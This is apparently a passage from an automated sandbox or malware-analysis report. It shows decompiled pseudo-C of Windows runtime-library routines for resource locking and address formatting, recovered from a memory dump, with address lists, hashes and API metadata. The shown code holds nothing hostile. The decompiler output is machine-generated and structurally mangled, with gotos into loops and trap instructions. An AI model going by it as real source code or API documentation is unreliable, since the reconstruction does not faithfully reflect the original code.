				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020f01c0;
									_push(_t144);
									_push(0);
									_t51 = E0200F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02054FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02063F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02063F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0209217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02063F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02053915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020f01c0;
												_push(_t138);
												_push(0);
												_t58 = E0200F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02054FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02063F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02063F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0209217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02063F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02053915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02035384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0200F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02053915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0200F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02053915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0200F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02053915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E02035329(_t110, _t138);
																_t69 = E020353A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                              0x0205055a
                                                              0x0205055d
                                                              0x02050563
                                                              0x02050566
                                                              0x020505d8
                                                              0x020505e2
                                                              0x020505e5
                                                              0x00000000
                                                              0x020505e7
                                                              0x020505e7
                                                              0x020505ea
                                                              0x020505f3
                                                              0x020505f3
                                                              0x02050568
                                                              0x02050568
                                                              0x02050568
                                                              0x02050569
                                                              0x02050569
                                                              0x02050569
                                                              0x0205056b
                                                              0x00000000
                                                              0x00000000
                                                              0x0207217f
                                                              0x02072183
                                                              0x0207225b
                                                              0x0207225f
                                                              0x02072189
                                                              0x0207218c
                                                              0x0207218f
                                                              0x02072194
                                                              0x02072199
                                                              0x0207219d
                                                              0x020721a0
                                                              0x020721a2
                                                              0x020721ce
                                                              0x020721ce
                                                              0x020721ce
                                                              0x020721d0
                                                              0x020721d6
                                                              0x020721de
                                                              0x020721e2
                                                              0x020721e8
                                                              0x020721e9
                                                              0x020721ec
                                                              0x020721f1
                                                              0x020721f6
                                                              0x00000000
                                                              0x00000000
                                                              0x020721f8
                                                              0x020721fb
                                                              0x02072206
                                                              0x0207220b
                                                              0x0207220c
                                                              0x02072217
                                                              0x02072226
                                                              0x0207222b
                                                              0x0207222c
                                                              0x0207222f
                                                              0x02072232
                                                              0x02072235
                                                              0x02072235
                                                              0x0207223a
                                                              0x0207223f
                                                              0x02072241
                                                              0x02072243
                                                              0x02072248
                                                              0x02072248
                                                              0x0207224d
                                                              0x0207224f
                                                              0x02072262
                                                              0x02072263
                                                              0x02072268
                                                              0x02072269
                                                              0x02072269
                                                              0x02072269
                                                              0x0207226d
                                                              0x00000000
                                                              0x00000000
                                                              0x02072276
                                                              0x02072279
                                                              0x0207227e
                                                              0x02072283
                                                              0x02072287
                                                              0x0207228a
                                                              0x0207228d
                                                              0x0207228f
                                                              0x020722bc
                                                              0x020722bc
                                                              0x020722bc
                                                              0x020722be
                                                              0x020722c4
                                                              0x020722cc
                                                              0x020722d0
                                                              0x020722d6
                                                              0x020722d7
                                                              0x020722da
                                                              0x020722df
                                                              0x020722e4
                                                              0x00000000
                                                              0x00000000
                                                              0x020722e6
                                                              0x020722e9
                                                              0x020722f4
                                                              0x020722f9
                                                              0x020722fa
                                                              0x02072305
                                                              0x02072314
                                                              0x02072319
                                                              0x0207231a
                                                              0x0207231d
                                                              0x02072320
                                                              0x02072323
                                                              0x02072323
                                                              0x02072328
                                                              0x0207232d
                                                              0x0207232f
                                                              0x02072331
                                                              0x02072336
                                                              0x02072336
                                                              0x0207233b
                                                              0x0207233d
                                                              0x02072350
                                                              0x02072351
                                                              0x02072356
                                                              0x02072359
                                                              0x02072359
                                                              0x0207235b
                                                              0x0207235d
                                                              0x02035367
                                                              0x0203536b
                                                              0x02035372
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x02072363
                                                              0x02072363
                                                              0x02072369
                                                              0x0207236a
                                                              0x0207236c
                                                              0x02072371
                                                              0x02072373
                                                              0x00000000
                                                              0x02072379
                                                              0x02072379
                                                              0x0207237a
                                                              0x0207237f
                                                              0x0207237f
                                                              0x02072385
                                                              0x02072386
                                                              0x02072389
                                                              0x0207238e
                                                              0x02072390
                                                              0x02035378
                                                              0x0203537c
                                                              0x02072396
                                                              0x02072396
                                                              0x02072397
                                                              0x0207239c
                                                              0x020723a2
                                                              0x020723a3
                                                              0x020723a6
                                                              0x020723ab
                                                              0x020723ad
                                                              0x00000000
                                                              0x020723b3
                                                              0x020723b3
                                                              0x020723b4
                                                              0x020723b9
                                                              0x020723ba
                                                              0x020723ba
                                                              0x020723bc
                                                              0x020723bf
                                                              0x00000000
                                                              0x00000000
                                                              0x02069153
                                                              0x02069158
                                                              0x0206915a
                                                              0x0206915e
                                                              0x02069160
                                                              0x00000000
                                                              0x02069166
                                                              0x02069166
                                                              0x02069171
                                                              0x02069176
                                                              0x02069176
                                                              0x00000000
                                                              0x02069160
                                                              0x020723c6
                                                              0x020723ce
                                                              0x020723d7
                                                              0x020723d7
                                                              0x020723ad
                                                              0x02072390
                                                              0x02072373
                                                              0x0207233f
                                                              0x0207233f
                                                              0x00000000
                                                              0x0207233f
                                                              0x02072291
                                                              0x02072291
                                                              0x02072293
                                                              0x02072295
                                                              0x0207229a
                                                              0x020722a1
                                                              0x020722a3
                                                              0x020722a7
                                                              0x020722a9
                                                              0x00000000
                                                              0x00000000
                                                              0x020722ab
                                                              0x020722ad
                                                              0x020722af
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x020722af
                                                              0x020722b1
                                                              0x020722b4
                                                              0x020722b4
                                                              0x020722b6
                                                              0x020353be
                                                              0x020353be
                                                              0x020353be
                                                              0x020353c0
                                                              0x00000000
                                                              0x00000000
                                                              0x020353cb
                                                              0x020353ce
                                                              0x020353d0
                                                              0x020353d4
                                                              0x020353d6
                                                              0x00000000
                                                              0x020353d8
                                                              0x020353e3
                                                              0x020353ea
                                                              0x020353ea
                                                              0x00000000
                                                              0x020353d6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x020722b6
                                                              0x00000000
                                                              0x0207228f
                                                              0x02072349
                                                              0x0207234d
                                                              0x02072251
                                                              0x02072251
                                                              0x00000000
                                                              0x02072251
                                                              0x020721a4
                                                              0x020721a4
                                                              0x020721a6
                                                              0x020721a8
                                                              0x020721ac
                                                              0x020721b6
                                                              0x020721b8
                                                              0x020721bc
                                                              0x020721be
                                                              0x00000000
                                                              0x00000000
                                                              0x020721c0
                                                              0x020721c2
                                                              0x020721c4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x020721c4
                                                              0x020721c6
                                                              0x020721c6
                                                              0x020721c8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x020721c8
                                                              0x020721a2
                                                              0x00000000
                                                              0x02072183
                                                              0x0205057b
                                                              0x0205057d
                                                              0x02050581
                                                              0x02050583
                                                              0x02072178
                                                              0x00000000
                                                              0x02050589
                                                              0x0205058f
                                                              0x0205058f
                                                              0x02050583
                                                              0x00000000

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02072206
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-4236105082
                                                              • Opcode ID: 7f0a36b984cbd0cd0215f6dd876d8aa098fa6c65ef34c017d0e2f88e466beaa9
                                                              • Instruction ID: 097e49719ffc325ea1b42b744fe94e52887e501acb84db9ca3b4e43b5509363a
                                                              • Opcode Fuzzy Hash: 7f0a36b984cbd0cd0215f6dd876d8aa098fa6c65ef34c017d0e2f88e466beaa9
                                                              • Instruction Fuzzy Hash: 00510871B403116FEB55CB18CCC1FA633EAAB98710F218259ED55DF285DA31EC42AB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 020514C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 64%
                                                              			E020514C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x20f2088; // 0x761d41cf
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02047707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E020513CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02047707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02047707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02012340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0201E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                              0x020514c0
                                                              0x020514cb
                                                              0x020514d2
                                                              0x020514d6
                                                              0x020514da
                                                              0x020514de
                                                              0x020514e3
                                                              0x0205157a
                                                              0x0205157a
                                                              0x020514f1
                                                              0x020514f3
                                                              0x0207ea0f
                                                              0x00000000
                                                              0x0207ea15
                                                              0x00000000
                                                              0x0207ea15
                                                              0x020514f9
                                                              0x020514f9
                                                              0x020514fe
                                                              0x02051504
                                                              0x0207ea1a
                                                              0x0207ea1f
                                                              0x0207ea21
                                                              0x0207ea22
                                                              0x0207ea27
                                                              0x0207ea2a
                                                              0x0207ea2a
                                                              0x02051515
                                                              0x02051517
                                                              0x0205156d
                                                              0x02051572
                                                              0x02051575
                                                              0x02051575
                                                              0x0205151e
                                                              0x0207ea50
                                                              0x0207ea55
                                                              0x0207ea58
                                                              0x0207ea58
                                                              0x0205152e
                                                              0x02051531
                                                              0x02051533
                                                              0x00000000
                                                              0x02051535
                                                              0x02051541
                                                              0x02051549
                                                              0x02051549
                                                              0x02051533
                                                              0x020514f3
                                                              0x02051559

                                                              APIs
                                                              • ___swprintf_l.LIBCMT ref: 0207EA22
                                                                • Part of subcall function 020513CB: ___swprintf_l.LIBCMT ref: 0205146B
                                                                • Part of subcall function 020513CB: ___swprintf_l.LIBCMT ref: 02051490
                                                              • ___swprintf_l.LIBCMT ref: 0205156D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: a0a66718372ea677bcb144ba8fceddfcf6a92cde87e4f87524f1f80ac562a2df
                                                              • Instruction ID: ade23c89b11aa6fd560e456ad6a042d140bb578c66bc9abd25c5de5981d2d709
                                                              • Opcode Fuzzy Hash: a0a66718372ea677bcb144ba8fceddfcf6a92cde87e4f87524f1f80ac562a2df
                                                              • Instruction Fuzzy Hash: EF219172900329EBDB61DE58CC40BEFB3BDEB10704F444565EC4AE3140EB70AA589BE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 020353A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 45%
                                                              			E020353A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x020f01c0;
									_push(_t92);
									_push(0);
									_t37 = E0200F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02054FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02063F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02063F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0209217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02063F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02053915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02035384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0200F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02053915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0200F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02053915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0200F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02053915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E02035329(_t74, _t92);
													_push(1);
													_t48 = E020353A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                              0x020353ab
                                                              0x020353ae
                                                              0x020353b1
                                                              0x020353b4
                                                              0x020353b7
                                                              0x020505b6
                                                              0x020505c0
                                                              0x020505c3
                                                              0x00000000
                                                              0x020505c9
                                                              0x020505c9
                                                              0x020505cc
                                                              0x020505d5
                                                              0x020505d5
                                                              0x020353bd
                                                              0x020353bd
                                                              0x020353bd
                                                              0x020353be
                                                              0x020353be
                                                              0x020353be
                                                              0x020353c0
                                                              0x00000000
                                                              0x00000000
                                                              0x02072269
                                                              0x0207226d
                                                              0x02072349
                                                              0x0207234d
                                                              0x02072273
                                                              0x02072276
                                                              0x02072279
                                                              0x0207227e
                                                              0x02072283
                                                              0x02072287
                                                              0x0207228a
                                                              0x0207228d
                                                              0x0207228f
                                                              0x020722bc
                                                              0x020722bc
                                                              0x020722bc
                                                              0x020722be
                                                              0x020722c4
                                                              0x020722cc
                                                              0x020722d0
                                                              0x020722d6
                                                              0x020722d7
                                                              0x020722da
                                                              0x020722df
                                                              0x020722e4
                                                              0x00000000
                                                              0x00000000
                                                              0x020722e6
                                                              0x020722e9
                                                              0x020722f4
                                                              0x020722f9
                                                              0x020722fa
                                                              0x02072305
                                                              0x02072314
                                                              0x02072319
                                                              0x0207231a
                                                              0x0207231d
                                                              0x02072320
                                                              0x02072323
                                                              0x02072323
                                                              0x02072328
                                                              0x0207232d
                                                              0x0207232f
                                                              0x02072331
                                                              0x02072336
                                                              0x02072336
                                                              0x0207233b
                                                              0x0207233d
                                                              0x02072350
                                                              0x02072351
                                                              0x02072356
                                                              0x02072359
                                                              0x02072359
                                                              0x0207235b
                                                              0x0207235d
                                                              0x02035367
                                                              0x0203536b
                                                              0x02035372
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x02072363
                                                              0x02072363
                                                              0x02072369
                                                              0x0207236a
                                                              0x0207236c
                                                              0x02072371
                                                              0x02072373
                                                              0x00000000
                                                              0x02072379
                                                              0x02072379
                                                              0x0207237a
                                                              0x0207237f
                                                              0x0207237f
                                                              0x02072385
                                                              0x02072386
                                                              0x02072389
                                                              0x0207238e
                                                              0x02072390
                                                              0x02035378
                                                              0x0203537c
                                                              0x02072396
                                                              0x02072396
                                                              0x02072397
                                                              0x0207239c
                                                              0x020723a2
                                                              0x020723a3
                                                              0x020723a6
                                                              0x020723ab
                                                              0x020723ad
                                                              0x00000000
                                                              0x020723b3
                                                              0x020723b3
                                                              0x020723b4
                                                              0x020723b9
                                                              0x020723ba
                                                              0x020723ba
                                                              0x020723bc
                                                              0x020723bf
                                                              0x00000000
                                                              0x00000000
                                                              0x02069153
                                                              0x02069158
                                                              0x0206915a
                                                              0x0206915e
                                                              0x02069160
                                                              0x00000000
                                                              0x02069166
                                                              0x02069166
                                                              0x02069171
                                                              0x02069176
                                                              0x02069176
                                                              0x00000000
                                                              0x02069160
                                                              0x020723c6
                                                              0x020723cb
                                                              0x020723ce
                                                              0x020723d7
                                                              0x020723d7
                                                              0x020723ad
                                                              0x02072390
                                                              0x02072373
                                                              0x0207233f
                                                              0x0207233f
                                                              0x00000000
                                                              0x0207233f
                                                              0x02072291
                                                              0x02072291
                                                              0x02072293
                                                              0x02072295
                                                              0x0207229a
                                                              0x020722a1
                                                              0x020722a3
                                                              0x020722a7
                                                              0x020722a9
                                                              0x00000000
                                                              0x00000000
                                                              0x020722ab
                                                              0x020722ad
                                                              0x020722af
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x020722af
                                                              0x020722b1
                                                              0x020722b4
                                                              0x020722b4
                                                              0x020722b6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x020722b6
                                                              0x0207228f
                                                              0x00000000
                                                              0x0207226d
                                                              0x020353cb
                                                              0x020353ce
                                                              0x020353d0
